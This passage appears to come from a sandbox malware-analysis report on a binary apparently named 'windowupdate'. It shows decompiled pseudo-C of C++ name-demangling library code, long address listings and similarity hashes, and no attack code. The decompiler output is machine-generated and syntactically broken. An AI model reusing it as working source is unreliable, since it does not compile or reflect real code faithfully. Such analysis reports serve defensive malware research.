								__eax = E00D4F7E0(__ecx,  &_v180);
								goto L33;
							case 0xb:
								_v172 = E00D50060("<unknown>", 9);
								_v168 = __edx;
								__ecx =  &_v172;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v172);
								goto L33;
							case 0xc:
								_v188 = E00D50060("char16_t", 8);
								_v184 = __edx;
								__eax =  &_v188;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v188);
								goto L33;
							case 0xd:
								_v220 = E00D50060("decltype(auto)", 0xe);
								_v216 = __edx;
								__ecx =  &_v220;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v220);
								goto L33;
							case 0xe:
								_v196 = E00D50060("char32_t", 8);
								_v192 = __edx;
								__ecx =  &_v196;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v196);
								goto L33;
							case 0xf:
								_v204 = E00D50060("wchar_t", 7);
								_v200 = __edx;
								__edx =  &_v204;
								__ecx =  &_v12;
								__eax = E00D4F7E0(__ecx,  &_v204);
								goto L33;
							case 0x10:
								__edx =  *0xf20640;
								__edx =  *0xf20640 - 1;
								 *0xf20640 = __edx;
								 &_v308 = E00D54C20(__edx,  &_v308);
								__ecx =  &_v12;
								__eax = E00D4F820( &_v12, __eax);
								__ecx =  &_v12;
								__eax = E00D5A560(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									__ecx =  &_v12;
									__ecx = _a4;
									E00D4F240(_a4,  &_v12) = _a4;
									return _a4;
								}
								goto L33;
							case 0x11:
								goto L32;
						}
					case 0xa:
						goto L35;
				}
			}





































































































                      0x00d52cd9
                      0x00d52ce3
                      0x00d534eb
                      0x00000000
                      0x00d534f3
                      0x00d52ce9
                      0x00d52cf1
                      0x00d52cf4
                      0x00d52cfd
                      0x00d52d03
                      0x00d52d06
                      0x00d52d09
                      0x00d52d0d
                      0x00d52d17
                      0x00d52d20
                      0x00d52d29
                      0x00d52d30
                      0x00d53200
                      0x00d53200
                      0x00d53208
                      0x00d53214
                      0x00d53219
                      0x00d53220
                      0x00d53228
                      0x00d5322d
                      0x00d5322f
                      0x00d53245
                      0x00d53249
                      0x00d533a1
                      0x00d533ad
                      0x00d533b2
                      0x00d533b6
                      0x00d53421
                      0x00d53426
                      0x00d53428
                      0x00d53431
                      0x00d53434
                      0x00d53497
                      0x00d53497
                      0x00d5349a
                      0x00d534a3
                      0x00d534a8
                      0x00d534ab
                      0x00d534b1
                      0x00d534c1
                      0x00d534c1
                      0x00d53436
                      0x00d5343d
                      0x00d53442
                      0x00d53445
                      0x00d5344b
                      0x00d53451
                      0x00d5345b
                      0x00d53463
                      0x00d53466
                      0x00d5346f
                      0x00d53474
                      0x00d53477
                      0x00d5347d
                      0x00d5348d
                      0x00d5348d
                      0x00d53492
                      0x00d53434
                      0x00d534d2
                      0x00000000
                      0x00d534da
                      0x00d533bb
                      0x00d533c0
                      0x00d533cc
                      0x00d533d7
                      0x00d533dc
                      0x00d533de
                      0x00d533ef
                      0x00d533f5
                      0x00d53405
                      0x00d53405
                      0x00d53411
                      0x00000000
                      0x00d53416
                      0x00d53253
                      0x00d5325c
                      0x00d53263
                      0x00d5335b
                      0x00d53365
                      0x00d53380
                      0x00d53380
                      0x00d5338c
                      0x00000000
                      0x00d53391
                      0x00d53269
                      0x00d5326c
                      0x00d53273
                      0x00000000
                      0x00d532cc
                      0x00d532d2
                      0x00d532d8
                      0x00d532dc
                      0x00d532ea
                      0x00d532f3
                      0x00d532f6
                      0x00000000
                      0x00000000
                      0x00d53289
                      0x00d5328f
                      0x00d532a7
                      0x00d532ac
                      0x00d532b3
                      0x00000000
                      0x00000000
                      0x00d532fd
                      0x00d53301
                      0x00d53307
                      0x00d5330a
                      0x00d5330d
                      0x00d53311
                      0x00000000
                      0x00000000
                      0x00d53313
                      0x00d53316
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d53273
                      0x00d53238
                      0x00000000
                      0x00d5323d
                      0x00d52d36
                      0x00d52d39
                      0x00d52d40
                      0x00000000
                      0x00d52d4e
                      0x00d52d53
                      0x00d52d56
                      0x00d52d59
                      0x00d52d63
                      0x00000000
                      0x00000000
                      0x00d52d7c
                      0x00d52d7f
                      0x00d52d82
                      0x00d52d86
                      0x00d52d89
                      0x00000000
                      0x00000000
                      0x00d52da2
                      0x00d52da5
                      0x00d52da8
                      0x00d52dac
                      0x00d52daf
                      0x00000000
                      0x00000000
                      0x00d52dc8
                      0x00d52dcb
                      0x00d52dce
                      0x00d52dd2
                      0x00d52dd5
                      0x00000000
                      0x00000000
                      0x00d52dee
                      0x00d52df1
                      0x00d52df4
                      0x00d52df8
                      0x00d52dfb
                      0x00000000
                      0x00000000
                      0x00d52e26
                      0x00d52e35
                      0x00d52e38
                      0x00d52e3b
                      0x00d52e3f
                      0x00d52e42
                      0x00000000
                      0x00000000
                      0x00d52e14
                      0x00d52e17
                      0x00d52e1a
                      0x00d52e1e
                      0x00d52e21
                      0x00000000
                      0x00000000
                      0x00d52e50
                      0x00d52e53
                      0x00000000
                      0x00000000
                      0x00d531e3
                      0x00d531e9
                      0x00d531ef
                      0x00d531f6
                      0x00d531f9
                      0x00000000
                      0x00000000
                      0x00d52e5b
                      0x00d52e62
                      0x00d52e6b
                      0x00d52e6e
                      0x00d52e77
                      0x00d52e7a
                      0x00d52e7e
                      0x00d52e81
                      0x00d52e85
                      0x00d531a8
                      0x00d531b7
                      0x00d531bd
                      0x00d531c3
                      0x00d531ca
                      0x00d531cd
                      0x00d531d2
                      0x00000000
                      0x00d531d2
                      0x00d52e8b
                      0x00d52e8e
                      0x00d52e95
                      0x00000000
                      0x00d53194
                      0x00d53197
                      0x00d5319e
                      0x00d531a1
                      0x00000000
                      0x00000000
                      0x00d53154
                      0x00d5315a
                      0x00d53160
                      0x00d5316b
                      0x00d53174
                      0x00d5317b
                      0x00d53187
                      0x00000000
                      0x00000000
                      0x00d52edd
                      0x00d52ee0
                      0x00d52ee3
                      0x00d52ee7
                      0x00d52eea
                      0x00000000
                      0x00000000
                      0x00d52f03
                      0x00d52f09
                      0x00d52f0f
                      0x00d52f16
                      0x00d52f19
                      0x00000000
                      0x00000000
                      0x00d52f32
                      0x00d52f38
                      0x00d52f3e
                      0x00d52f45
                      0x00d52f48
                      0x00000000
                      0x00000000
                      0x00d52f61
                      0x00d52f67
                      0x00d52f6d
                      0x00d52f74
                      0x00d52f77
                      0x00000000
                      0x00000000
                      0x00d52f90
                      0x00d52f96
                      0x00d52f9c
                      0x00d52fa3
                      0x00d52fa6
                      0x00000000
                      0x00000000
                      0x00d52eb7
                      0x00d52eba
                      0x00d52ebd
                      0x00d52ec1
                      0x00d52ec4
                      0x00000000
                      0x00000000
                      0x00d52e9c
                      0x00000000
                      0x00000000
                      0x00d530aa
                      0x00d530b0
                      0x00d530b6
                      0x00d530bd
                      0x00d530c0
                      0x00000000
                      0x00000000
                      0x00d52fee
                      0x00d52ff4
                      0x00d52ffa
                      0x00d53001
                      0x00d53004
                      0x00000000
                      0x00000000
                      0x00d52fbf
                      0x00d52fc5
                      0x00d52fcb
                      0x00d52fd2
                      0x00d52fd5
                      0x00000000
                      0x00000000
                      0x00d5301d
                      0x00d53023
                      0x00d53029
                      0x00d53030
                      0x00d53033
                      0x00000000
                      0x00000000
                      0x00d530d9
                      0x00d530df
                      0x00d530e5
                      0x00d530ec
                      0x00d530ef
                      0x00000000
                      0x00000000
                      0x00d5304c
                      0x00d53052
                      0x00d53058
                      0x00d5305f
                      0x00d53062
                      0x00000000
                      0x00000000
                      0x00d5307b
                      0x00d53081
                      0x00d53087
                      0x00d5308e
                      0x00d53091
                      0x00000000
                      0x00000000
                      0x00d530f9
                      0x00d530ff
                      0x00d53102
                      0x00d5310f
                      0x00d53118
                      0x00d5311b
                      0x00d53120
                      0x00d53123
                      0x00d53128
                      0x00d5312a
                      0x00d5312c
                      0x00d53130
                      0x00d53138
                      0x00000000
                      0x00d53138
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$operator+$EmptyName::is$Iterator_baseIterator_base::_std::_
                      • String ID: volatile$char$const$double$float$int$long$long $short$signed $unsigned $volatile
                      • API String ID: 2623725463-1006727529
                      • Opcode ID: 19743a18666f6b2466705cf87ab354e6770ad3d5f6043504e7d85ff15321c163
                      • Instruction ID: bd93d0bb1f16842e1405841eb3fe55d94edf70b8a6727ecea98b06371fb1fca1
                      • Opcode Fuzzy Hash: 19743a18666f6b2466705cf87ab354e6770ad3d5f6043504e7d85ff15321c163
                      • Instruction Fuzzy Hash: 51D14DB6C00219AFCF15DF94DC52AEEBB74AF54301F04416AE91A6A292EB705748CFB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D55E80 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 243COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 99%
                      			E00D55E80(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
				char _v12;
				signed int _v13;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v36;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				char _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v136;
				char _v144;
				char _v152;
				signed int _v156;
				char _v160;
				char _v168;
				signed int _v172;
				char _v176;
				char _v184;
				char _v192;
				char _v200;
				char _v208;
				char _v216;
				char _v224;
				char _v232;
				char _v240;
				char _v248;
				char _v256;
				char _v264;
				char _v272;
				char _v280;
				char _v288;
				char _v296;
				char _v304;
				char _v312;
				char _v320;
				char _v328;
				signed int _t256;
				signed int _t271;

				E00D4F3F0( &_v12);
				E00D4F3F0( &_v36);
				_v60 = 0;
				_v20 = 0;
				_t256 =  *0xf20640; // 0x0
				_v80 =  *_t256;
				_t271 =  *0xf20640; // 0x0
				 *0xf20640 = _t271 + 1;
				_v48 = _v80;
				if(_v48 > 0x5f) {
					L73:
					E00D4F350(_a4, 2);
					return _a4;
				}
				_t10 = _v48 + 0xd56840; // 0xd560c905
				switch( *((intOrPtr*)(( *_t10 & 0x000000ff) * 4 +  &M00D56824))) {
					case 0:
						 *0xf20640 =  *0xf20640 - 1;
						E00D4F350(_a4, 1);
						return _a4;
					case 1:
						_t15 =  &_v44; // -39
						__ecx = _t15;
						__eax = E00D4F3F0(_t15);
						__ecx = _a8 & 0x000000ff;
						__eflags = _a8 & 0x000000ff;
						if(__eflags == 0) {
							L11:
							__ecx =  *0xf20640; // 0x0
							_v84 = __ecx;
							_t29 =  &_v208; // -203
							__edx = _t29;
							__eax = E00D5A1E0(__ebx, __edi, __esi, _t29, 0, 0);
							_t30 =  &_v12; // -7
							__ecx = _t30;
							__eax = _v84;
							 *0xf20640 = _v84;
							_t32 =  &_v12; // -7
							__ecx = _t32;
							__eax = E00D5A560(_t32);
							__eflags = __eax;
							if(__eax == 0) {
								__ecx = 1;
								__edx = 0xffffffffffffffff;
								__eax =  *0xf20640; // 0x0
								__ecx =  *(__eax + 0xffffffffffffffff);
								__eflags =  *(__eax + 0xffffffffffffffff) - 0x31;
								if( *(__eax + 0xffffffffffffffff) == 0x31) {
									_t34 =  &_v12; // -7
									__edx = _t34;
									_t35 =  &_v216; // -211
									_t35 = E00D4FAD0(_t35, 0x7e, _t34);
									_t36 =  &_v12; // -7
									__ecx = _t36;
									__eax = E00D4F820(_t36, __eax);
								}
							}
							_t37 =  &_v44; // -39
							__ecx = _t37;
							__eax = E00D5A560(_t37);
							__eflags = __eax;
							if(__eax == 0) {
								_t38 =  &_v44; // -39
								__ecx = _t38;
								_t39 =  &_v12; // -7
								__ecx = _t39;
								__eax = E00D4FD40(_t39, _t38);
							}
							_t40 =  &_v12; // -7
							__edx = _t40;
							__ecx = _a4;
							E00D4F240(_a4, _t40) = _a4;
							return _a4;
						}
						_t17 =  &_v192; // -187
						__edx = _t17;
						__eax = E00D58210(__ebx, __edi, __esi, __eflags, _t17);
						_t18 =  &_v200; // -195
						_t18 = E00D4FAD0(_t18, 0x3c, _t18);
						_t19 =  &_v44; // -39
						__ecx = _t19;
						__eax = E00D4FD40(_t19, __eax);
						_t20 =  &_v44; // -39
						__ecx = _t20;
						__eax = E00D55990(_t20);
						__ecx = __al;
						__eflags = __al - 0x3e;
						if(__al == 0x3e) {
							_t21 =  &_v44; // -39
							__ecx = _t21;
							__eax = E00D4FDE0(_t21, 0x20);
						}
						_t22 =  &_v44; // -39
						__ecx = _t22;
						__eax = E00D4FDE0(_t22, 0x3e);
						__eflags = _a12;
						if(_a12 != 0) {
							__edx = _a12;
							 *_a12 = 1;
						}
						__eax =  *0xf20640; // 0x0
						__ecx =  *__eax;
						__eflags =  *__eax;
						if( *__eax != 0) {
							__eax =  *0xf20640; // 0x0
							__eax = __eax + 1;
							__eflags = __eax;
							 *0xf20640 = __eax;
							goto L11;
						} else {
							_t25 =  &_v44; // -39
							__edx = _t25;
							__ecx = _a4;
							E00D4F240(_a4, _t25) = _a4;
							return _a4;
						}
					case 2:
						__eax = 1;
						__ecx = 0xffffffffffffffff;
						__edx =  *0xf20640; // 0x0
						__eax =  *(__edx + 0xffffffffffffffff);
						__ecx =  *(__edx + 0xffffffffffffffff) * 8 +  &M00DC8838;
						_t46 =  &_v12; // -7
						__ecx = _t46;
						__eax = E00D4F7E0(_t46,  *(__edx + 0xffffffffffffffff) * 8 +  &M00DC8838);
						goto L74;
					case 3:
						L19:
						__edx = 1;
						__eax = 0xffffffffffffffff;
						__ecx =  *0xf20640; // 0x0
						__edx =  *(_t51 + 0xffffffffffffffff);
						__eax =  *(_t51 + 0xffffffffffffffff) * 8 +  &M00DC8800;
						_t51 =  &_v12; // -7
						__ecx = _t51;
						__eax = E00D4F7E0(_t51,  *(_t51 + 0xffffffffffffffff) * 8 +  &M00DC8800);
						goto L74;
					case 4:
						_v60 = 1;
						goto L19;
					case 5:
						__ecx =  *0xf20640;
						__edx =  *( *0xf20640);
						_v88 =  *( *0xf20640);
						__eax =  *0xf20640; // 0x0
						 *0xf20640 = __eax;
						__ecx = _v88;
						_v52 = _v88;
						__eflags = _v52 - 0x5f;
						if(_v52 > 0x5f) {
							L71:
							__ecx = _a4;
							E00D4F350(_a4, 2) = _a4;
							return _a4;
						}
						__edx = _v52;
						__eax =  *(_v52 + 0xd568d4) & 0x000000ff;
						switch( *((intOrPtr*)(( *(_v52 + 0xd568d4) & 0x000000ff) * 4 +  &M00D568A0))) {
							case 0:
								 *0xf20640 =  *0xf20640 - 1;
								 *0xf20640 =  *0xf20640 - 1;
								__ecx = _a4;
								E00D4F350(_a4, 1) = _a4;
								return _a4;
							case 1:
								__edx = 1;
								__eax = 0xffffffffffffffff;
								__ecx =  *0xf20640; // 0x0
								__edx =  *(_t65 + 0xffffffffffffffff);
								__eax = 0xdc8958 +  *(_t65 + 0xffffffffffffffff) * 8;
								_t65 =  &_v12; // -7
								__ecx = _t65;
								__eax = E00D4F7E0(_t65, 0xdc8958 +  *(_t65 + 0xffffffffffffffff) * 8);
								goto L72;
							case 2:
								__ecx = 1;
								__edx = 0xffffffffffffffff;
								__eax =  *0xf20640; // 0x0
								__ecx =  *(__eax + 0xffffffffffffffff);
								__edx = 0xdc8958 +  *(__eax + 0xffffffffffffffff) * 8;
								__ecx = _a4;
								__eax = _a4;
								return _a4;
							case 3:
								__eax = 1;
								__ecx = 0xffffffffffffffff;
								__edx =  *0xf20640; // 0x0
								__eax =  *(__edx + 0xffffffffffffffff);
								__ecx = 0xdc8958 +  *(__edx + 0xffffffffffffffff) * 8;
								_t74 =  &_v136; // -131
								__ecx = _t74;
								__eax = E00D4F1F0(_t74, 0xdc8958 +  *(__edx + 0xffffffffffffffff) * 8);
								_t75 =  &_v136; // -131
								__ecx = _t75;
								__eax = E00D5AB30(_t75);
								_t76 =  &_v136; // -131
								__edx = _t76;
								__ecx = _a4;
								E00D4F240(_a4, _t76) = _a4;
								return _a4;
							case 4:
								__edx =  *0xf20640;
								__eax =  *( *0xf20640);
								_v120 =  *( *0xf20640);
								 *0xf20640 =  *0xf20640 + 1;
								 *0xf20640 =  *0xf20640 + 1;
								__edx = _v120;
								_v56 = _v120;
								__eflags = _v56;
								if(_v56 == 0) {
									 *0xf20640 =  *0xf20640 - 1;
									 *0xf20640 =  *0xf20640 - 1;
									__ecx = _a4;
									E00D4F350(_a4, 1) = _a4;
									return _a4;
								}
								__eflags = _v56 - 0x30;
								if(_v56 == 0x30) {
									_push(0);
									__ecx =  &_v152;
									__eax = E00D57F80(__ebx, __edi, __esi,  &_v152, 1);
									__ecx =  &_v152;
									__eax = E00D5AAC0( &_v152);
									__edx =  &_v152;
									__ecx = _a4;
									E00D4F240(_a4,  &_v152) = _a4;
									return _a4;
								}
								__ecx = _a4;
								E00D4F350(_a4, 2) = _a4;
								return _a4;
							case 5:
								__edx = 1;
								__eax = 0xffffffffffffffff;
								__ecx =  *0xf20640;
								__edx =  *( *0xf20640 + 0xffffffffffffffff);
								__eax = 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
								__ecx = _a4;
								E00D4F1F0(_a4, 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8) = _a4;
								return _a4;
							case 6:
								_push(1);
								 &_v144 = E00D57F80(__ebx, __edi, __esi,  &_v144, 0);
								__ecx =  &_v144;
								__eax = E00D5AAC0( &_v144);
								__ecx =  &_v144;
								__ecx = _a4;
								E00D4F240(_a4,  &_v144) = _a4;
								return _a4;
							case 7:
								__ecx = 1;
								__edx = 0xffffffffffffffff;
								__eax =  *0xf20640;
								__ecx =  *( *0xf20640 + 0xffffffffffffffff);
								__edx = 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
								__ecx =  &_v12;
								E00D4F7E0( &_v12, 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8) =  &_v224;
								__eax = E00D55E80(__ebx, __edi, __esi,  &_v224, 0, 0);
								__ecx =  &_v36;
								__eax = E00D4F820( &_v36, __eax);
								__ecx =  &_v36;
								__eax = E00D5A560( &_v36);
								__eflags = __eax;
								if(__eax != 0) {
									L31:
									__ecx =  &_v36;
									__edx = _a4;
									__ecx =  &_v12;
									E00D4FB70( &_v12, _a4,  &_v36) = _a4;
									return _a4;
								}
								__ecx =  &_v36;
								__eax = E00D5A660( &_v36);
								__eflags = __eax;
								if(__eax == 0) {
									goto L31;
								}
								__ecx = _a4;
								E00D4F350(_a4, 2) = _a4;
								return _a4;
							case 8:
								goto L72;
							case 9:
								__eax = 1;
								__ecx = 0xffffffffffffffff;
								__edx =  *0xf20640;
								__eax =  *( *0xf20640 + 0xffffffffffffffff);
								__ecx = 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
								__ecx =  &_v12;
								__eax = E00D4F7E0( &_v12, 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8);
								__edx = 1;
								__eax = 0;
								__ecx =  *0xf20640;
								__edx =  *__ecx;
								__eflags =  *__ecx;
								if( *__ecx != 0) {
									__ecx = 1;
									__edx = 0;
									__eax =  *0xf20640;
									__ecx =  *__eax;
									__ecx =  *__eax - 0x30;
									__eflags = __ecx;
									_v20 = __ecx;
									if(__ecx < 0) {
										L37:
										__ecx = _a4;
										E00D4F350(_a4, 2) = _a4;
										return _a4;
									}
									__eflags = _v20 - 5;
									if(_v20 < 5) {
										__edx = _v20;
										__eax = 0xdc8c60 + _v20 * 8;
										__ecx =  &_v36;
										__eax = E00D4F7E0( &_v36, 0xdc8c60 + _v20 * 8);
										__ecx =  *0xf20640;
										__edx =  *( *0xf20640);
										_v92 =  *( *0xf20640);
										 *0xf20640 =  *0xf20640 + 1;
										 *0xf20640 =  *0xf20640 + 1;
										__ecx = _v92;
										_v24 = _v92;
										_v24 = _v24 - 0x30;
										_v24 = _v24 - 0x30;
										__eflags = _v24 - 4;
										if(__eflags > 0) {
											 *0xf20640 =  *0xf20640 - 1;
											 *0xf20640 =  *0xf20640 - 1;
											__ecx = _a4;
											E00D4F350(_a4, 1) = _a4;
											return _a4;
										}
										__eax = _v24;
										switch( *((intOrPtr*)(_v24 * 4 +  &M00D56934))) {
											case 0:
												__ecx =  &_v184;
												__eax = E00D54380(__ebx, __edi, __esi, __eflags,  &_v184, 0);
												__edx =  &_v232;
												__ecx =  &_v184;
												_v96 = E00D4FBB0( &_v184,  &_v232, 0x20);
												__eax =  &_v12;
												__ecx =  &_v240;
												__ecx = _v96;
												_v100 = E00D4FB70(_v96,  &_v240,  &_v12);
												__edx =  &_v36;
												__eax = _a4;
												__ecx = _v100;
												E00D4FB70(_v100, _a4,  &_v36) = _a4;
												return _a4;
											case 1:
												__ecx =  &_v36;
												__edx =  &_v68;
												__ecx =  &_v12;
												E00D4FB70( &_v12,  &_v68,  &_v36) =  &_v248;
												_v104 = E00D57C80(__ebx, __edi, __esi,  &_v248);
												__ecx =  &_v256;
												__ecx = _v104;
												__eax = E00D4FBB0(_v104,  &_v256, 0x2c);
												__ecx =  &_v68;
												__eax = E00D4FD40( &_v68, __eax);
												__edx =  &_v264;
												_v108 = E00D57C80(__ebx, __edi, __esi,  &_v264);
												__eax =  &_v272;
												__ecx = _v108;
												__eax = E00D4FBB0(_v108,  &_v272, 0x2c);
												__ecx =  &_v68;
												__eax = E00D4FD40( &_v68, __eax);
												__ecx =  &_v280;
												_v112 = E00D57C80(__ebx, __edi, __esi,  &_v280);
												__edx =  &_v288;
												__ecx = _v112;
												__eax = E00D4FBB0(_v112,  &_v288, 0x2c);
												__ecx =  &_v68;
												__eax =  &_v296;
												_v116 = E00D54900(__ebx, __edi, __esi,  &_v296, 0);
												__ecx =  &_v304;
												__ecx = _v116;
												__eax = E00D4FBB0(_v116,  &_v304, 0x29);
												__ecx =  &_v68;
												__eax = E00D4FD40( &_v68, __eax);
												__edx = _a4;
												__ecx =  &_v68;
												E00D4FBB0( &_v68, _a4, 0x27) = _a4;
												return _a4;
											case 2:
												__eax =  &_v36;
												__ecx = _a4;
												__ecx =  &_v12;
												E00D4FB70( &_v12, _a4,  &_v36) = _a4;
												return _a4;
										}
									}
									goto L37;
								}
								__eax = _a4;
								__ecx =  &_v12;
								E00D4FC30( &_v12, _a4, 1) = _a4;
								return _a4;
							case 0xa:
								__eax = 1;
								__ecx = 0xffffffffffffffff;
								__edx =  *0xf20640;
								__eax =  *( *0xf20640 + 0xffffffffffffffff);
								__ecx = 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
								__ecx =  &_v12;
								__eax = E00D4F7E0( &_v12, 0xdc8920 +  *( *0xf20640 + 0xffffffffffffffff) * 8);
								L72:
								L74:
								__eflags = _v60;
								if(_v60 == 0) {
									_t244 =  &_v12; // -7
									__ecx = _t244;
									__eax = E00D5A560(_t244);
									__eflags = __eax;
									if(__eax == 0) {
										_v176 = E00D50060("operator", 8);
										_v172 = __edx;
										_t247 =  &_v12; // -7
										__ecx = _t247;
										_t248 =  &_v176; // -171
										__edx = _t248;
										_t249 =  &_v328; // -323
										_t249 = E00D4FAA0(_t249, _t248, _t247);
										_t250 =  &_v12; // -7
										__ecx = _t250;
										__eax = E00D4F820(_t250, __eax);
									}
								} else {
									_t243 =  &_v12; // -7
									__ecx = _t243;
									__eax = E00D5AB00(_t243);
								}
								_t251 =  &_v12; // -7
								__ecx = _t251;
								__ecx = _a4;
								E00D4F240(_a4, _t251) = _a4;
								return _a4;
							case 0xb:
								__eax =  *0xf20640;
								__ecx =  *( *0xf20640);
								_v128 =  *( *0xf20640);
								 *0xf20640 =  *0xf20640 + 1;
								 *0xf20640 =  *0xf20640 + 1;
								__eax = _v128;
								_v28 = _v128;
								_v28 = _v28 - 0x41;
								_v28 = _v28 - 0x41;
								__eflags = _v28 - 0xd;
								if(_v28 > 0xd) {
									__ecx = _a4;
									E00D4F350(_a4, 2) = _a4;
									return _a4;
								}
								__edx = _v28;
								switch( *((intOrPtr*)(_v28 * 4 +  &M00D56948))) {
									case 0:
										__eax = 1;
										__ecx = 0xffffffffffffffff;
										__edx =  *0xf20640;
										__eax =  *( *0xf20640 + 0xffffffffffffffff);
										__ecx = 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
										__ecx = _a4;
										E00D4F1F0(_a4, 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8) = _a4;
										return _a4;
									case 1:
										__edx = 1;
										__eax = 0xffffffffffffffff;
										__ecx =  *0xf20640;
										__edx =  *( *0xf20640 + 0xffffffffffffffff);
										__eax = 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
										__ecx =  &_v76;
										__eax = E00D4F1F0( &_v76, 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8);
										__ecx =  *0xf20640;
										__edx =  *( *0xf20640);
										__eflags =  *( *0xf20640) - 0x3f;
										if(__eflags != 0) {
											__ecx =  &_v320;
											__eax = E00D58180( &_v320);
											__ecx =  &_v76;
											__eax = E00D4FD40( &_v76, __eax);
										} else {
											 &_v312 = E00D544C0(__ebx, __edi, __esi, __eflags,  &_v312);
											__ecx =  &_v76;
											__eax = E00D4FD40( &_v76, __eax);
											__ecx =  *0xf20640;
											__edx =  *( *0xf20640);
											__eflags =  *( *0xf20640) - 0x40;
											if( *( *0xf20640) == 0x40) {
												__eax =  *0xf20640;
												__eax =  *0xf20640 + 1;
												__eflags = __eax;
												 *0xf20640 = __eax;
											}
										}
										_v160 = E00D50060("\'\'", 2);
										_v156 = __edx;
										__edx =  &_v160;
										__ecx =  &_v76;
										E00D4FCA0( &_v76,  &_v160) =  &_v76;
										__ecx = _a4;
										E00D4F240(_a4,  &_v76) = _a4;
										return _a4;
									case 2:
										__ecx = 1;
										__edx = 0xffffffffffffffff;
										__eflags = 0xffffffffffffffff;
										__eax =  *0xf20640;
										__ecx =  *( *0xf20640 + 0xffffffffffffffff);
										__edx = 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8;
										__ecx =  &_v168;
										__eax = E00D4F1F0( &_v168, 0xdc89e8 +  *( *0xf20640 + 0xffffffffffffffff) * 8);
										while(1) {
											__eax =  *0xf20640;
											__ecx =  *( *0xf20640);
											__eflags =  *( *0xf20640);
											if( *( *0xf20640) == 0) {
												break;
											}
											__edx =  *0xf20640;
											__eax =  *( *0xf20640);
											__eflags =  *( *0xf20640) - 0x40;
											if( *( *0xf20640) == 0x40) {
												break;
											}
											__ecx =  *0xf20640;
											_v13 =  *( *0xf20640);
											 *0xf20640 =  *0xf20640 + 1;
											 *0xf20640 =  *0xf20640 + 1;
											__ecx = _v13 & 0x000000ff;
											__ecx =  &_v168;
											__eax = E00D4FDE0( &_v168, _v13 & 0x000000ff);
										}
										__edx =  *0xf20640;
										__eax =  *( *0xf20640);
										__eflags =  *( *0xf20640) - 0x40;
										if( *( *0xf20640) == 0x40) {
											__ecx =  *0xf20640;
											__ecx =  *0xf20640 + 1;
											__eflags = __ecx;
											 *0xf20640 = __ecx;
										}
										__edx =  &_v168;
										__ecx = _a4;
										E00D4F240(_a4,  &_v168) = _a4;
										return _a4;
									case 3:
										__eax =  *0xf20640;
										__ecx =  *( *0xf20640);
										_v124 =  *( *0xf20640);
										 *0xf20640 =  *0xf20640 + 1;
										 *0xf20640 =  *0xf20640 + 1;
										__eflags = _v124 - 0x32;
										if(_v124 != 0x32) {
											__ecx = _a4;
											E00D4F350(_a4, 2) = _a4;
											return _a4;
										}
										_a4 = E00D59D50(__ebx, __edi, __esi, _a4);
										__eax = _a4;
										return _a4;
								}
							case 0xc:
								goto L71;
						}
					case 6:
						goto L73;
				}
			}


























































                      0x00d55e8c
                      0x00d55e94
                      0x00d55e99
                      0x00d55ea0
                      0x00d55ea7
                      0x00d55eaf
                      0x00d55eb2
                      0x00d55ebb
                      0x00d55ec4
                      0x00d55ecb
                      0x00d567a7
                      0x00d567ac
                      0x00000000
                      0x00d567b1
                      0x00d55ed4
                      0x00d55edb
                      0x00000000
                      0x00d55eea
                      0x00d55ef4
                      0x00000000
                      0x00000000
                      0x00d55f01
                      0x00d55f01
                      0x00d55f04
                      0x00d55f09
                      0x00d55f0d
                      0x00d55f0f
                      0x00d55f9c
                      0x00d55f9c
                      0x00d55fa2
                      0x00d55fa9
